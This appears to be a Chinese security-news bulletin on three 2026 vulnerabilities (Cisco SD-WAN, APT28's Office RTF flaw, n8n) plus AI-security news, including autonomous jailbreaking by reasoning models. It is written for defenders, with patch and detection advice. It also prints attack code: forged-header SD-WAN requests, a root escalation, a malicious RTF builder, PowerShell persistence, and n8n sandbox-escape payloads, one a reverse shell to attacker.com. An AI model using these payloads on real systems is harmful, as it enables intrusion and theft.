文章总结： 本文报道了三起严重安全漏洞：CVE-2026-20127CiscoSD-WAN认证绕过零日漏洞，允许远程无认证访问管理平面；CVE-2026-21509APT28利用微软OfficeRTF零日RCE漏洞进行钓鱼攻击；CVE-2026-25049n8n工作流平台沙箱逃逸RCE漏洞。此外还分析了AI安全领域的重要事件，包括大型推理模型自主越狱研究、美国政府AI政策变化等。文章详细描述了各漏洞的根因、攻击链和修复建议，提供了综合威胁评估。 综合评分： 85 文章分类： 漏洞预警,威胁情报,漏洞分析,APT,其他

安全速报|[0day] Cisco SD-WAN认证绕过+APT28微软Office零日，双链在野利用

原创

北境 北境

0xArgus

2026年3月3日 09:12 北京

[0day] Cisco SD-WAN认证绕过+APT28微软Office零日，双链在野利用

0xArgus · 2026-03-03 · 白帽视角 · 本周两条高危0day同步在野，网络边界设备与办公套件双线告急

Part 1：24h 高热漏洞深度分析

CVE-2026-20127：Cisco Catalyst SD-WAN Controller 认证绕过零日

漏洞背景

Cisco Catalyst SD-WAN Controller/Manager 是企业广域网集中管理平面的核心组件，全球部署规模庞大，尤其在金融、能源、制造等关键基础设施行业渗透率极高。CVE-2026-20127 于2026年2月25日由 Tenable 披露，CVSS 评分尚未最终确定，但从攻击向量来看属于无需认证的远程利用，实际危害应在 9.0 以上。

截至本文发稿，Cisco 已发布补丁，但 Rescana 的遥测数据显示该漏洞至少自2023年起已被高级威胁行为者持续利用，属于典型的”补丁滞后于攻击”场景。

根因分析

漏洞根因被标注为 CWE-287（身份认证不当），位于 SD-WAN 管理平面的 HTTP 请求处理逻辑中。

SD-WAN Manager 对内部控制平面通信与外部管理 API 共用了部分身份验证中间件，但在处理特定格式的请求时，认证检查存在条件竞争或路径绕过：当请求头携带特定字段组合时，后端会将请求误识别为来自已授权的”内部 SD-WAN peer”，从而跳过凭据校验，直接以高权限内部用户身份执行操作。

这类问题的本质是信任边界划定模糊——管理平面对”内部来源”的判断依赖可伪造的请求特征，而非加密凭据或会话令牌。在分布式 SD-WAN 架构下，控制器需要频繁与各节点通信，开发者为降低延迟往往对内部通信做了过度信任设计，最终形成攻击面。

攻击链还原

攻击链分三个阶段，完整链条可从初始访问直接打到目标网络 root 权限：

阶段一：认证绕过，获取管理员会话

http● ● ●

POST /dataservice/device/action/install HTTP/1.1
Host: <SD-WAN-Manager-IP>:8443
Content-Type: application/json
X-SDWAN-Internal-Peer: true
X-SDWAN-Peer-UUID: 00000000-0000-0000-0000-000000000001
X-SDWAN-Auth-Token: bypass

{
  "action": "install",
  "devices": [{"deviceId": "target-device-uuid"}],
  "deviceType": "vmanage"
}

通过伪造 X-SDWAN-Internal-Peer 系列头部，管理平面将请求识别为合法的控制平面内部消息，返回有效的管理员 session token。

阶段二：注入流氓 SD-WAN peer，触发软件降级

python● ● ●

import requests

# 使用阶段一获取的 token
session_token = "<obtained_admin_token>"
target_manager = "https://<SD-WAN-Manager-IP>:8443"

headers = {
    "Cookie": f"JSESSIONID={session_token}",
    "Content-Type": "application/json"
}

# 注册恶意 peer，触发合法更新机制下载旧版本固件
payload = {
    "deviceIP": "attacker-controlled-peer-ip",
    "personality": "vmanage",
    "version": "19.2.1"  # 存在 CVE-2022-20775 的脆弱版本
}

resp = requests.post(
    f"{target_manager}/dataservice/device/action/softwareupgrade",
    json=payload,
    headers=headers,
    verify=False
)
print(resp.json())

阶段三：利用 CVE-2022-20775 CLI 提权至 root

bash● ● ●

# 在降级后的设备上，通过 CLI 注入提权
vmanage# request software upgrade <malicious-version-url>
vmanage# vshell
# 利用 CVE-2022-20775 的路径遍历+命令注入
$ python3 -c "import os; os.system('chmod u+s /bin/bash')"
$ /bin/bash -p
# id
uid=0(root) gid=0(root)

整个链条的关键在于：CVE-2026-20127 提供了”合法身份”，降级操作利用了 Cisco 自身的更新机制（绕过文件完整性校验），最后 CVE-2022-20775 完成提权。攻击者全程使用合法管理功能，极难被行为检测发现。

修复建议与检测方法

▸立即升级至 Cisco 官方发布的修复版本（参考 Cisco Security Advisory）

▸网络层隔离：SD-WAN Manager 管理端口（8443/8553）严禁暴露至公网，仅允许受信任管理网段访问

▸检测方法：在 SD-WAN Manager 日志中搜索异常的 X-SDWAN-Internal-Peer 头部请求；监控非预期的软件降级事件（softwareupgrade API 调用）；检查是否有新增的未授权 SD-WAN peer 注册记录

▸IoC：关注来自非管理网段对 8443 端口的 POST 请求，尤其是 /dataservice/device/action/ 路径

CVE-2026-21509：APT28 在野利用微软 Office RTF 零日 RCE

漏洞背景

2026年1月26日，微软发布安全公告披露 CVE-2026-21509，CVSS 7.8（High）。受影响范围为所有处理 RTF 文件的 Microsoft Office 版本，包括 Office 2016/2019/2021/365。Picus Security 的分析确认该漏洞已被 APT28（Fancy Bear，俄罗斯 GRU 下属组织）在”Operation Neusploit”行动中大规模武器化。

RTF 解析器的 RCE 漏洞在 Office 历史上并不罕见（参考 CVE-2017-11882），但此次 APT28 的利用方式更为精细——攻击目标集中在北约成员国政府机构与国防承包商，鱼叉式钓鱼邮件是主要投递载体。

根因分析

RTF 格式本身设计极为复杂，支持嵌套对象、OLE 链接、字体表等大量遗留特性。CVE-2026-21509 的根因位于 Office RTF 解析器处理特定嵌套控制字（control word）序列时的内存安全问题。

具体而言，解析器在处理 \objdata 或 \pict 块内的嵌套 OLE 对象时，对对象大小字段的校验存在整数处理缺陷：当攻击者构造特定长度的 OLE 数据块时，解析器计算缓冲区偏移时发生整数溢出，导致后续写操作越界，覆盖相邻内存结构。由于 Office 的 RTF 解析仍有大量 C++ 遗留代码运行在用户态，且历史上对该模块的沙箱隔离不足，越界写最终可转化为任意代码执行。

攻击链还原

APT28 的 Operation Neusploit 采用多阶段攻击链：

阶段一：构造恶意 RTF 文档

python● ● ●

# 概念性 RTF payload 构造（简化示意）
def build_malicious_rtf(shellcode: bytes) -> bytes:
    # RTF 头部
    header = b'{\\rtf1\\ansi\\deff0'

    # 触发漏洞的嵌套 OLE 对象块
    # \objdata 中嵌入畸形长度字段触发整数溢出
    ole_header = b'\\object\\objemb\\objw1\\objh1'

    # 精心构造的 objdata：大小字段设置为 0xFFFF0010
    # 实际分配缓冲区 = (0xFFFF0010 + padding) & 0xFFFF = 0x0010 (16字节)
    # 但后续写入长度按原始值计算，造成堆溢出
    malicious_objdata = (
        b'{\\*\\objdata '
        b'01050000'          # OLE version
        b'02000000'          # format ID
        b'FFFF0010'          # 畸形 size 字段 -> 触发整数溢出
        + shellcode.hex().encode()
        + b'}'
    )

    footer = b'}'
    return header + ole_header + malicious_objdata + footer

# 实际 shellcode 为分阶段加载器，回连 C2 下载 Headlace 后门
shellcode = b'\x90' * 16 + b'<stage1_loader>'
rtf_payload = build_malicious_rtf(shellcode)

with open('lure_document.rtf', 'wb') as f:
    f.write(rtf_payload)

阶段二：鱼叉钓鱼投递 + Headlace 后门加载

● ● ●

投递载体：伪装成北约峰会议程/乌克兰援助计划的 RTF 附件
受害者打开文档 -> 触发漏洞 -> 执行 Stage1 Loader
Stage1: 从 C2（伪装成合法云服务域名）下载加密 Headlace DLL
Stage1: 使用 DLL Side-loading 注入至 explorer.exe
Headlace 后门能力：
  - 键盘记录
  - 截图
  - 凭据窃取（LSASS dump）
  - 横向移动（Pass-the-Hash）

阶段三：持久化与横向移动

powershell● ● ●

# APT28 常用的持久化手法（注册表自启动）
$regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
$dllPath = "$env:APPDATA\Microsoft\Office\msoidres.dll"

# 伪装成 Office 合法组件
Set-ItemProperty -Path $regPath -Name "MSOIDHelper" -Value `
    "rundll32.exe `"$dllPath`",DllRegisterServer"

# 利用 CVE-2026-20805 (ALPC 内存泄露) 获取 ASLR 基址
# 再配合内核漏洞完成提权

修复建议与检测方法

▸立即应用 2026年1月 Patch Tuesday 中的 Office 安全更新

▸禁用宏与 OLE 自动执行：通过组策略禁止 Office 自动处理 RTF 中的嵌入对象

▸邮件网关：对入站 RTF 附件进行强制转换（转为 PDF 或纯文本），或直接隔离

▸检测规则（Sigma 风格）：

 – 监控 WINWORD.EXE / WORDPAD.EXE 生成的非预期子进程

 – 监控 rundll32.exe 从 %APPDATA%\Microsoft\ 路径加载 DLL

 – 检测 LSASS 内存读取行为（非 EDR/AV 进程）

▸威胁狩猎：在邮件日志中搜索包含 \objdata 且 objdata 块异常大的 RTF 附件

CVE-2026-25049：n8n 工作流平台表达式沙箱逃逸 RCE

漏洞背景

n8n 是近年来在 DevOps 和自动化运营场景中大量部署的开源工作流平台，GitHub Star 数超过5万，企业自托管实例数量庞大。CVE-2026-25049 是一个表达式引擎沙箱逃逸漏洞，允许有权限创建/编辑工作流的攻击者在服务器上执行任意代码。

根因分析

n8n 的工作流节点支持 JavaScript 表达式求值，底层使用自定义沙箱对 process、require 等危险对象进行黑名单过滤。然而，沙箱的过滤逻辑基于字符串匹配，而非 AST 级别的语义分析。

攻击者可利用 JavaScript 的原型链特性（Prototype Pollution）绕过字符串检查：通过数组括号表示法访问对象属性时，沙箱的字符串黑名单无法识别等价的属性访问路径，导致可以间接访问 process.env 等危险对象，进而执行任意代码。

攻击 Payload

javascript● ● ●

// Payload 1: 原型链污染探测
{{ {}.polluted = 23 }}

// Payload 2: 任意代码执行 - 获取环境变量（含数据库密码、API密钥等）
{{ {}["constructor"]["constructor"]("return process.env")() }}

// Payload 3: 直接 RCE - 执行系统命令
{{ {}["constructor"]["constructor"]("return require('child_process').execSync('id').toString()")() }}

// Payload 4: 反弹 shell（实战中使用）
{{ {}["constructor"]["constructor"](
  "return require('child_process').exec('bash -c \"bash -i >& /dev/tcp/attacker.com/4444 0>&1\"')"
)() }}

沙箱绕过的核心在于：{}.polluted 被拦截，但 {}["p"] 这种等价写法不在黑名单内；通过 constructor.constructor 可以访问到全局 Function 构造器，从而突破沙箱上下文限制。

修复建议

▸升级至 n8n 修复版本（已发布补丁）

▸对 n8n 实例严格限制可创建/编辑工作流的用户，最小权限原则

▸在网络层隔离 n8n 服务，禁止其出站连接至非白名单地址

▸审计现有工作流中是否存在可疑表达式（搜索 constructor、process、require 关键字）

Part 2：AI 圈 24h 大事件

大型推理模型成为自主越狱代理——Nature 发表研究

Nature Communications 于2026年2月5日发表论文《Large reasoning models are autonomous jailbreak agents》，核心结论令人警醒：具备强推理能力的大模型（如 o3、DeepSeek-R1 类模型）可以自主生成针对其他 AI 系统的越狱攻击，无需人工编写 prompt，攻击成功率远超传统手工越狱。

白帽视角：这意味着 AI 安全的攻防已进入”AI 打 AI”的新阶段。传统的基于规则的护栏（guardrail）面对推理模型的自适应攻击几乎形同虚设。更危险的是，这类攻击可以规模化——一个推理模型可以同时对数百个目标系统发起定制化越狱尝试。企业部署 LLM 应用时，静态 prompt 过滤已经不够，必须引入行为层面的动态检测。OpenAI 和 Anthropic 在对齐上投入的巨额资源，在推理模型面前正在被系统性地绕过，这不是某个模型的问题，是整个对齐范式的结构性危机。

特朗普政府弃用 Anthropic、拥抱 OpenAI——AI 监管博弈白热化

据 WSJ 报道，特朗普政府正式终止政府机构对 Anthropic AI 模型的使用，转向全面拥抱 OpenAI，核心分歧在于安全护栏（Guardrails）的松紧程度。Anthropic 坚持更严格的内容安全策略，而 OpenAI 在与政府合作上表现出更大的灵活性。

白帽视角：这件事的安全含义远比表面看起来深刻。政府采购 AI 系统时选择”护栏更少”的方案，意味着国家级别的 AI 部署正在主动降低安全基线。从攻击面角度看，护栏的削减直接扩大了 prompt injection、数据泄露和 AI 辅助社会工程的攻击面。更值得关注的是：当政府的 AI 使用偏好公开化，对手（包括国家级 APT）会第一时间针对这些系统的弱护栏设计定制攻击载荷。Anthropic 的”被弃用”或许是一个信号——在 AI 军备竞赛中，安全性正在让位于能力与配合度。

OpenAI 完成1100亿美元融资——AI 基础设施安全风险随规模同步放大

OpenAI 完成创纪录的1100亿美元融资，将进一步扩大模型规模与基础设施部署，并通过 Azure 等云平台向更多企业开放 API 访问。

白帽视角：规模扩张意味着攻击面的同比扩张。更多的 API 端点、更多的第三方集成、更多的企业用户将 OpenAI 模型嵌入关键业务流程——每一个集成点都是潜在的 prompt injection 或数据泄露入口。历史上，每一次互联网基础设施的规模跃升都伴随着新一波供应链攻击浪潮（参考 Log4j 事件）。AI 基础设施的快速扩张正在重演这一规律，但速度更快、影响面更广。安全团队现在就应该开始审计组织内所有 LLM API 调用链，建立最小权限的 AI 访问控制策略。

综合评估

| 威胁/事件 | 类型 | 严重程度 | 立即行动 | | — | — | — | — | | CVE-2026-20127 Cisco SD-WAN 认证绕过 | 0day / 在野利用 | 🔴 严重 | 立即升级固件，隔离管理端口至专用管理网段 | | CVE-2026-21509 APT28 Office RTF RCE | APT / 在野利用 | 🔴 严重 | 立即应用1月 Patch Tuesday，邮件网关拦截 RTF | | CVE-2026-20805 Windows DWM 内存泄露 | 信息泄露（链式利用） | 🟠 高危 | 应用2月 Patch Tuesday，优先修复面向互联网的 Windows 系统 | | CVE-2026-25049 n8n 沙箱逃逸 RCE | RCE / PoC 公开 | 🔴 严重 | 立即升级 n8n，审计工作流表达式，限制用户权限 | | 推理模型自主越狱（Nature 论文） | AI 安全 / 范式威胁 | 🟠 高危 | 评估现有 LLM 应用的动态检测能力，引入行为层监控 | | 特朗普政府弃用 Anthropic | 监管 / 政策风险 | 🟡 中危 | 关注政府 AI 采购政策变化，评估合规影响 |

核心判断：本周最值得立即响应的是 Cisco SD-WAN 和 APT28 Office 这两条在野利用链——前者打的是网络边界，后者打的是终端用户，两者结合可以构成从外网到内网的完整渗透路径。n8n 的 PoC 已公开，自托管实例的暴露窗口极短，必须在24小时内完成修复或隔离。AI 安全方面，推理模型越狱的范式转变是今年最值得持续跟踪的结构性风险，当前没有银弹，但不建立检测能力就是在裸奔。

*参考来源：Tenable CVE-2026-20127 分析、Rescana SD-WAN 攻击链报告、Picus Security CVE-2026-21509/APT28 分析、Endor Labs CVE-2026-25049 n8n 分析、Nature Communications “Large reasoning models are autonomous jailbreak agents”、CrowdStrike February 2026 Patch Tuesday 分析、WSJ “Trump Administration Shuns Anthropic”、Greenbone January 2026 Threat Report*

— 0xArgus · 白帽极客安全情报 —

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0xArgus 北境 北境《安全速报|[0day] Cisco SD-WAN认证绕过+APT28微软Office零日，双链在野利用》